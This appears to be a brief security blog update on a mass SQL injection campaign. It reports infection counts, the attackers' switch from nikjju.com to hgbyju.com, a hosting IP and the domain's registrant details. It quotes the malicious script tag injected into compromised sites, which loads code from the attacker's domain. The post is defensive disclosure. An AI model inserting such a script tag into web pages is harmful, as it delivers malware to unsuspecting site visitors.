We posted a few days ago about a Mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju.com malware.
However, since the last two days, the attackers switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 18.104.22.168). So the following code is now getting added to the compromised web sites:
<script src = http://hgbyju.com/r.php <</script>
This domain name was registered just a few days ago (April 17) by James Northone email@example.com, same name/email used on nikjju.com and many other domains from similar malware campaigns (probably fake):
James Northone firstname.lastname@example.org
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
So they have been at this for a while with no sign at stopping.